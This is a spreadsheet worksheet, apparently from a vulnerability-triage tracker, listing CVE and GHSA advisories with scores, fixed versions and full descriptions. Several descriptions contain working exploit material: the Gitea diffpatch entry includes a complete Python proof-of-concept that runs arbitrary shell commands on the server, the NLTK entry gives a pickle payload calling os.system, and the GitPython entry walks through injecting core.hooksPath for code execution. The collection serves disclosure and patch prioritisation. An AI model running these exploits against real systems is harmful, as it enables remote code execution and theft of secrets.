<file path=xl/worksheets/sheet6.xml><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:S165" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D2" s="5" t="inlineStr" /><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2" s="5" t="inlineStr" /><c r="H2" s="5" t="n"><v>0.868</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr" /><c r="L2" s="5" t="inlineStr"><is><t>go:gitea.dev</t></is></c><c r="M2" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N2" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2" s="5" t="inlineStr" /><c r="P2" s="5" t="inlineStr" /><c r="Q2" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R2" s="5" t="inlineStr"><is><t>### Summary

Gitea's `diffpatch` endpoint can be abused to install and execute a Git hook from repository-controlled content.

An attacker with ordinary write access to a repository can execute arbitrary shell commands as the Gitea OS user. With default open registration, an unauthenticated visitor can obtain the required write access by registering an account and creating a repository.

### Details

`services/repository/files/patch.go` applies attacker-controlled patches in a shared bare temporary clone:

```go
cmdApply := gitcmd.NewCommand("apply", "--index", "--recount", "--cached", "--binary")
if git.DefaultFeatures().CheckVersionAtLeast("2.32") {
    cmdApply.AddArguments("-3")
}
````

Submitting the same patch twice creates an add/add collision. Git's three-way fallback checks the indexed path out even though the operation is performed with `--cached`.

In a bare clone, the repository root is `$GIT_DIR`. As a result, an executable entry named:

```text
hooks/post-index-change
```

becomes a live Git hook.

Git invokes the hook while writing the index, allowing repository-controlled content to execute arbitrary commands as the Gitea service account.

The hook's return value is not propagated to the `diffpatch` response.

The attached PoC stores command output in Git objects and creates a branch containing the result, so no outbound connection is required. The result is fetched through authenticated smart HTTP.

### PoC

The supplied `gitea_diffpatch_rce_poc.py` uses an existing Gitea account. Run it against a test instance where the account can create a repository.

Set the account password:

```bash
export GITEA_PASSWORD='account-password'
```

Execute a command through the `diffpatch` chain:

```bash
python3 ./gitea_diffpatch_rce_poc.py \
  https://gitea.example \
  pocuser \
  'id; uname -srm; pwd'
```

The script:

* Creates an initialized private repository.
* Submits the same executable-hook patch twice.
* Fetches the result branch.
* Prints the command's combined stdout, stderr, and exit status.
* Prints the evidence repository, ref, and commit IDs to stderr.

Expected output resembles:

```text
uid=1000(git) gid=1000(git) groups=1000(git)
Linux ...
/data/gitea/tmp/...

[exit-status=0]
```

The trigger requires:

* Git 2.32 or newer.
* An enabled `diffpatch` route.
* A writable and executable temporary filesystem.

Open registration is required only for the no-prior-credentials attack path.

### Impact

This is remote command execution as the Gitea service account (`CWE-94`).

Depending on deployment isolation and the privileges of the Gitea OS user, successful exploitation may expose:

* `app.ini` and Gitea application secrets.
* Process environment secrets.
* Mounted repositories.
* Database credentials and database contents.
* OAuth and integration credentials.
* Other internal or externally reachable services.

With open registration enabled, the attack can be performed by an unauthenticated visitor after registering a normal account and creating a repository.


&lt;img width="928" height="687" alt="Screenshot 2026-07-25 at 14 45 44" src="https://github.com/user-attachments/assets/e7ce9fe7-bcab-4539-82fc-14c3856bda1c" /&gt;




```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Gitea RCE PoC – authorized testing only.
"""

from __future__ import annotations

import argparse
import base64
import getpass
import hashlib
import json
import os
from pathlib import Path

import secrets
import shlex
import shutil
import subprocess
import sys
import tempfile

from typing import Any
import urllib.error
import urllib.parse
import urllib.request


TIMEOUT    = 30.0
USER_AGENT = "gitea-rce-poc/2.0"

_RST  = "\033[0m"
_DIM  = "\033[2m"
_GRN  = "\033[38;5;46m"     # bright green
_RED  = "\033[31m"           # red for errors

def _g(t: str) -&gt; str: return f"{_GRN}{t}{_RST}"
def _r(t: str) -&gt; str: return f"{_RED}{t}{_RST}"
def _d(t: str) -&gt; str: return f"{_DIM}{t}{_RST}"

def log_star(msg: str) -&gt; None: print(f"{_g('[*]')} {_d(msg)}")
def log_ok  (msg: str) -&gt; None: print(f"{_g('[+]')} {_g(msg)}")
def log_err (msg: str) -&gt; None: print(f"{_r('[-]')} {_r(msg)}")


_SEP = "  " + "═" * 44
BANNER = f"{_SEP}\n  GITEA  REMOTE CODE EXECUTION  POC\n{_SEP}"

def print_banner(url: str, version: str | None = None,
                 command: str | None = None) -&gt; None:
    print()
    for line in BANNER.splitlines():
        print(_g(line))
    print()
    ver = version or "unknown"
    print(_g("  " + "-" * 54))
    print(_g(f"  Target        : {url}"))
    print(_g(f"  Version       : {ver}"))
    if command:
        print(_g(f"  Command       : {command}"))
    print(_g("  " + "-" * 54))
    print()

class PocError(RuntimeError):
    pass

class GiteaClient:
    def __init__(self, base_url: str, username: str, password: str) -&gt; None:
        parsed = urllib.parse.urlsplit(base_url)
        if parsed.scheme not in {"http", "https"} or not parsed.netloc:
            raise PocError("URL must be an absolute http:// or https:// URL")
        if parsed.query or parsed.fragment:
            raise PocError("URL must not contain a query string or fragment")
        self.base_url = base_url.rstrip("/")
        self.username = username
        self.password = password
        encoded = base64.b64encode(
            f"{username}:{password}".encode()
        ).decode("ascii")
        self.authorization = f"Basic {encoded}"

    def api(
        self,
        method: str,
        path: str,
        payload: dict[str, Any] | None = None,
    ) -&gt; tuple[int, Any]:
        data = None
        if payload is not None:
            data = json.dumps(payload, separators=(",", ":")).encode()
        req = urllib.request.Request(
            self.base_url + path,
            data=data,
            method=method,
            headers={
                "Accept": "application/json",
                "Authorization": self.authorization,
                "Content-Type": "application/json",
                "User-Agent": USER_AGENT,
            },
        )
        try:
            with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
                raw = r.read()
                return r.status, json.loads(raw) if raw else None
        except urllib.error.HTTPError as exc:
            body = exc.read().decode("utf-8", errors="replace")[:2_000]
            raise PocError(f"{method} {path} → HTTP {exc.code}: {body}") from exc
        except urllib.error.URLError as exc:
            raise PocError(f"{method} {path} failed: {exc.reason}") from exc
        except json.JSONDecodeError:
            raise PocError(f"{method} {path} returned invalid JSON")

def blob_oid(content: bytes) -&gt; str:
    return hashlib.sha1(
        f"blob {len(content)}\0".encode("ascii") + content
    ).hexdigest()

def build_hook(command: str, leak_ref: str) -&gt; bytes:
    qcmd = shlex.quote(command)
    qref = shlex.quote(f"refs/heads/{leak_ref}")
    return (
        "#!/bin/sh\n"
        'git_dir=$(git rev-parse --absolute-git-dir) || exit 1\n'
        'origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2\n'
        'case "$origin_objects" in\n'
        '  /*) ;;\n'
        '  *) origin_objects="$git_dir/objects/$origin_objects" ;;\n'
        "esac\n"
        'origin_git=${origin_objects%/objects}\n'
        '[ "$origin_git" != "$origin_objects" ] || exit 3\n'
        f"output_blob=$({{ /bin/sh -c {qcmd}; "
        'command_status=$?; printf "\\n[exit-status=%s]\\n" "$command_status"; } 2&gt;&amp;1 | '
        'git --git-dir="$origin_git" hash-object -w --stdin) || exit 4\n'
        'tree=$(printf "100644 blob %s\\toutput\\n" "$output_blob" | '
        'git --git-dir="$origin_git" mktree) || exit 5\n'
        'commit=$(printf "command output\\n" | '
        "GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@example.invalid "
        "GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@example.invalid "
        'git --git-dir="$origin_git" commit-tree "$tree") || exit 6\n'
        f'git --git-dir="$origin_git" update-ref {qref} "$commit" || exit 7\n'
        "exit 0\n"
    ).encode()

def build_patch(hook: bytes) -&gt; str:
    lc  = hook.count(b"\n")
    hdr = (
        "diff --git a/hooks/post-index-change b/hooks/post-index-change\n"
        "new file mode 100755\n"
        f"index {'0'*40}..{blob_oid(hook)}\n"
        "--- /dev/null\n"
        "+++ b/hooks/post-index-change\n"
        f"@@ -0,0 +1,{lc} @@\n"
    ).encode()
    return (hdr + b"".join(b"+" + l for l in hook.splitlines(keepends=True))).decode()

def run_git(git: str, arguments: list[str], env: dict[str, str]) -&gt; bytes:
    try:
        result = subprocess.run(
            [git, *arguments], env=env,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            check=False, timeout=TIMEOUT,
        )
    except subprocess.TimeoutExpired as exc:
        raise PocError(f"git timed out after {TIMEOUT:g}s") from exc
    except OSError as exc:
        raise PocError(f"could not run git: {exc}") from exc
    if result.returncode != 0:
        err = result.stderr.decode("utf-8", errors="replace")[:2_000].strip()
        raise PocError(f"git exit {result.returncode}: {err}")
    return result.stdout

def fetch_output(git: str, client: GiteaClient,
                 owner: str, repo: str, leak_ref: str) -&gt; bytes:
    remote = (
        f"{client.base_url}/"
        f"{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}.git"
    )
    with tempfile.TemporaryDirectory(prefix="gitea-poc-") as tmp:
        bare      = Path(tmp) / "fetch.git"
        auth_cfg  = Path(tmp) / "auth.config"
        fd = os.open(auth_cfg, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(f"[http]\n\textraHeader = Authorization: {client.authorization}\n")
        env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
        run_git(git, ["init", "--bare", "--quiet", str(bare)], env)
        run_git(git, [
            "-C", str(bare), "-c", f"include.path={auth_cfg}",
            "fetch", "--quiet", "--no-tags",
            remote, f"refs/heads/{leak_ref}",
        ], env)
        return run_git(git, ["-C", str(bare), "show", "FETCH_HEAD:output"], env)

def split_output(raw: bytes) -&gt; tuple[str, int | None]:
    text  = raw.decode("utf-8", errors="replace")
    lines = text.splitlines()
    status: int | None = None
    if lines:
        t = lines[-1].strip()
        if t.startswith("[exit-status=") and t.endswith("]"):
            try:    status = int(t[len("[exit-status="):-1])
            except ValueError: pass
            else:   lines.pop()
    return "\n".join(lines).rstrip("\n"), status


def parse_args() -&gt; argparse.Namespace:
    p = argparse.ArgumentParser(description="Gitea RCE PoC")
    p.add_argument("url",      help="Gitea base URL")
    p.add_argument("username", help="existing Gitea username")
    p.add_argument("command",  help="shell command to execute on target")
    return p.parse_args()


def main() -&gt; int:
    args = parse_args()
    if "\0" in args.command:
        raise PocError("command must not contain a NUL character")

    password = os.environ.get("GITEA_PASSWORD") or getpass.getpass(
        _g("[?]") + " password: "
    )
    if not password:
        raise PocError("password must not be empty")

    git = shutil.which("git")
    if git is None:
        raise PocError("git executable not found in PATH")

    client = GiteaClient(args.url, args.username, password)

    # version probe (pre-banner)
    log_star("probing target...")
    version: str | None = None
    try:
        r = urllib.request.Request(
            client.base_url + "/api/v1/version",
            headers={"Accept": "application/json", "User-Agent": USER_AGENT},
        )
        with urllib.request.urlopen(r, timeout=TIMEOUT) as resp:
            version = json.loads(resp.read()).get("version", "unknown")
    except Exception:
        version = "unknown"
    print_banner(client.base_url, version, args.command)

    log_star(f"target={client.base_url}  user={args.username}  cmd={args.command}")
    print()

    # step 1 – authenticate
    log_star("authenticating...")
    sc, acct = client.api("GET", "/api/v1/user")
    if sc != 200 or not isinstance(acct, dict):
        log_err("authentication failed"); raise PocError("auth failed")
    owner = acct.get("login")
    if not isinstance(owner, str) or not owner:
        log_err("no login in response"); raise PocError("no login")
    log_ok(f"logged in as {owner}  ({version})")

    # step 2 – create repo
    unique   = secrets.token_hex(5)
    repo     = f"test-repo-{unique}"
    leak_ref = f"output-{unique}"
    log_star("creating repository...")
    sc, _ = client.api("POST", "/api/v1/user/repos", {
        "name": repo, "private": True,
        "auto_init": True, "default_branch": "main",
        "object_format_name": "sha1",
    })
    if sc != 201:
        log_err("repo creation failed"); raise PocError("repo creation failed")
    log_ok(f"created repo {owner}/{repo}")

    # steps 3–4 – deliver payloads
    body = {
        "content": build_patch(build_hook(args.command, leak_ref)),
        "message": "initial commit",
        "branch": "main", "new_branch": "main",
    }
    ep = (
        f"/api/v1/repos/{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}/diffpatch"
    )
    commits: list[str] = []
    for cycle in (1, 2):
        log_star(f"delivering payload {cycle}/2...")
        sc, resp = client.api("POST", ep, body)
        try:
            commit = resp["commit"]["sha"]
        except (KeyError, TypeError) as exc:
            log_err(f"payload {cycle}/2 rejected")
            raise PocError(f"cycle {cycle} no commit") from exc
        if sc != 201:
            log_err(f"payload {cycle}/2 failed")
            raise PocError(f"cycle {cycle} failed")
        commits.append(commit)
        log_ok(f"payload {cycle}/2 accepted  commit={commit[:16]}")

    # step 5 – retrieve output
    log_star("retrieving output...")
    output = fetch_output(git, client, owner, repo, leak_ref)
    log_ok("operation complete")

    # command output
    cmd_out, exit_status = split_output(output)
    print()
    log_ok(f"{args.command}:")
    print(_g("---"))
    if cmd_out:
        for line in cmd_out.splitlines():
            print(_g(line))
    else:
        print(_d("&lt;no output&gt;"))
    print(_g("---"))
    if exit_status == 0:
        log_ok(f"exit status: {exit_status}")
    elif exit_status is None:
        log_star("exit status: unknown")
    else:
        log_err(f"exit status: {exit_status}")

    return 0


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PocError as exc:
        log_err(str(exc))
        raise SystemExit(1) from None

```</t></is></c><c r="S2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-62815</t></is></c><c r="D3" s="5" t="n"><v>10</v></c><c r="E3" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G3" s="5" t="inlineStr" /><c r="H3" s="5" t="n"><v>0.012</v></c><c r="I3" s="5" t="inlineStr" /><c r="J3" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K3" s="5" t="inlineStr" /><c r="L3" s="5" t="inlineStr"><is><t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL, nuget:Microsoft.Native.Quic.MsQuic.Schannel</t></is></c><c r="M3" s="5" t="inlineStr"><is><t>2.4.19, 2.5.10</t></is></c><c r="N3" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O3" s="5" t="inlineStr" /><c r="P3" s="5" t="inlineStr" /><c r="Q3" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R3" s="5" t="inlineStr"><is><t># Summary
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.

# Details

New network path creations and removals triggered by incoming packets can lead to a pointer invalidation.

## Patches

- Guard path promotion [e0f55b5](https://github.com/microsoft/msquic/commit/e0f55b5fdc9fff0b4465976d066ebd22fb7e2b3b)

# Impact

An unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to an affected service over the network. Successful exploitation could allow the attacker to execute code on the target system. No authentication or user interaction is required.</t></is></c><c r="S3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D4" s="5" t="n"><v>9.5</v></c><c r="E4" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G4" s="5" t="inlineStr" /><c r="H4" s="5" t="inlineStr" /><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr" /><c r="K4" s="5" t="inlineStr" /><c r="L4" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M4" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N4" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O4" s="5" t="inlineStr" /><c r="P4" s="5" t="inlineStr" /><c r="Q4" s="5" t="inlineStr"><is><t>CWE-1395</t></is></c><c r="R4" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="S4" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D5" s="5" t="n"><v>9.4</v></c><c r="E5" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G5" s="5" t="inlineStr" /><c r="H5" s="5" t="n"><v>0.003</v></c><c r="I5" s="5" t="inlineStr" /><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr" /><c r="L5" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M5" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N5" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O5" s="5" t="inlineStr" /><c r="P5" s="5" t="inlineStr" /><c r="Q5" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R5" s="5" t="inlineStr"><is><t>## Summary

The NLTK library's `TransitionParser.parse()` method deserializes model files using `pickle_load()` with the default `restricted=False` parameter, allowing arbitrary Python code execution when loading a malicious model file. The library provides a `RestrictedUnpickler` class for safe deserialization, but it is never used by production code paths, leaving the vulnerability unpatched.

## Root Cause

**File:** `nltk/parse/transitionparser.py` (lines 542-557)

The `parse()` method calls `pickle_load(f)` without `restricted=True`, routing through `WarningUnpickler` which inherits from `pickle.Unpickler` and does NOT override `find_class()`. This allows arbitrary class/function resolution during unpickling, enabling RCE via standard pickle gadgets (e.g., `os.system`, `subprocess.Popen`).

**Vulnerability chain in `nltk/picklesec.py`:**

```python
def pickle_load(file, *, context=None, restricted=False):
    if restricted:
        return RestrictedUnpickler(file).load()  # Safe: blocks all globals
    return WarningUnpickler(file, context=context).load()  # VULNERABLE PATH
```

`WarningUnpickler` only emits a warning but does NOT block unsafe class loading — it calls `super().load()` which is standard `pickle.Unpickler.load()`.

**Why this is not by design:**
- NLTK intentionally created `RestrictedUnpickler` to block unsafe deserialization
- The `restricted=True` parameter exists in the API but is **never used** by any production code path
- All call sites use the default `restricted=False`: `transitionparser.py:557`, `parse/chartparser_app.py:816`, `parse/chartparser_app.py:2273`, `parse/chartparser_app.py:2311`

## Attack Surface

**Entry point:** `TransitionParser().parse(depgraphs, modelFile)` receives a filesystem path with no validation.

**Exploitation path:**
1. Attacker places a malicious pickle file at a known or attacker-controlled location
2. Victim calls `parser.parse(sentences, "/path/to/malicious_model.pkl")`
3. `pickle_load()` deserializes the file with `restricted=False` (default)
4. Standard pickle gadget chain executes arbitrary Python code with victim's privileges

**Impact:** Remote code execution with the privileges of the user running the NLTK-dependent application. Affects researchers, data scientists, and automated ML pipelines using NLTK for parsing tasks.

## Steps to Reproduce

### Environment
- NLTK version: 3.8.1+ (all versions with `transitionparser.py`)
- Python 3.6+
- No special dependencies required

### Reproduction

1. Create a malicious pickle file that uses `__reduce__` to execute a system command during deserialization.

2. Call `TransitionParser().parse([], '/path/to/malicious_model.pkl')`.

3. The `pickle_load(f)` call at `transitionparser.py:557` uses `restricted=False` by default, routing through `WarningUnpickler`, which does not override `find_class()` and permits full class resolution — executing the embedded gadget.

4. Arbitrary code executes with the victim's privileges.

### Proof That the Fix Works

Changing line 557 in `transitionparser.py` from:
```python
model = pickle_load(f)
```
to:
```python
model = pickle_load(f, restricted=True)
```
causes `RestrictedUnpickler` to raise an `UnpicklingError` and block execution, confirming the safe path prevents the attack.

### Working PoC

```python
import pickle
import os
from nltk.parse.transitionparser import TransitionParser

# Create malicious pickle with RCE payload
class Exploit:
    def __reduce__(self):
        return (os.system, ('touch /tmp/nltk_poc_triggered',))

with open('/tmp/malicious_model.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)

# Trigger the vulnerable code path (requires algorithm argument in ≤ 3.9.4)
parser = TransitionParser('arc-standard')      # or 'arc-eager'
parser.parse([], '/tmp/malicious_model.pkl')   # loads and unpickles unsafely

# Exploit succeeds: file /tmp/nltk_poc_triggered is created
```

On NLTK ≥ 3.10.0 (patched), the same code fails with:

```
_pickle.UnpicklingError: global 'posix.system' is not in the pickle allowlist
```

This proves the vulnerability exists in versions ≤ 3.9.4 and is fixed in 3.10.0+.

## Recommended Fix

Change all call sites to use `restricted=True`:

| File | Line | Before | After |
|------|------|--------|-------|
| `nltk/parse/transitionparser.py` | 557 | `pickle_load(f)` | `pickle_load(f, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 816 | `pickle_load(model_data_file)` | `pickle_load(model_data_file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2273 | `pickle_load(file)` | `pickle_load(file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2311 | `pickle_load(fp)` | `pickle_load(fp, restricted=True)` |

**Note:** This fix may affect loading older sklearn models. A more robust approach would implement a module allowlist in `RestrictedUnpickler.find_class()`.</t></is></c><c r="S5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D6" s="5" t="n"><v>9.300000000000001</v></c><c r="E6" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F6" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G6" s="5" t="inlineStr" /><c r="H6" s="5" t="n"><v>0.004</v></c><c r="I6" s="5" t="inlineStr" /><c r="J6" s="5" t="inlineStr" /><c r="K6" s="5" t="inlineStr" /><c r="L6" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M6" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N6" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O6" s="5" t="inlineStr" /><c r="P6" s="5" t="inlineStr" /><c r="Q6" s="5" t="inlineStr"><is><t>CWE-88, CWE-94</t></is></c><c r="R6" s="5" t="inlineStr"><is><t>- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument
- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
GitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\r`/`\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.

That guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.

The bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and "handles" any embedded newline in the value with `.replace("\n", "\n\t")` (line 708), emitting a bare, unquoted `&lt;real newline&gt;&lt;tab&gt;` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `&lt;anything&gt;\nhooksPath = &lt;attacker path&gt;`, that second line is parsed as a brand-new `core.hooksPath = &lt;attacker path&gt;` directive — live, real Git configuration, not a value.

`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.

## Root cause
`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.

## Exploit path
1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:
   ```
   [core]
   	zzz = "A\nhooksPath = ../evil-hooks\
   "
   ```
   No raw `\r`, `\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.
2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value("user", "name", "Test User")`. This is one of the most ordinary operations a GitPython-based tool performs.
3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:
   ```
   [core]
   	...
   	zzz = A
   	hooksPath = ../evil-hooks
   ```
4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.
5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.

## Impact
Arbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` "Newline injection... enables RCE via core.hooksPath" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.

## Preconditions
- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `&lt;anything&gt;\n&lt;injected-key&gt; = &lt;injected-value&gt;`. Realistic delivery:
  1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, "repo" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.
  2. **The documented shared-config `[include]` pattern** (`[include] path = ../&lt;repo-tracked-file&gt;`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).
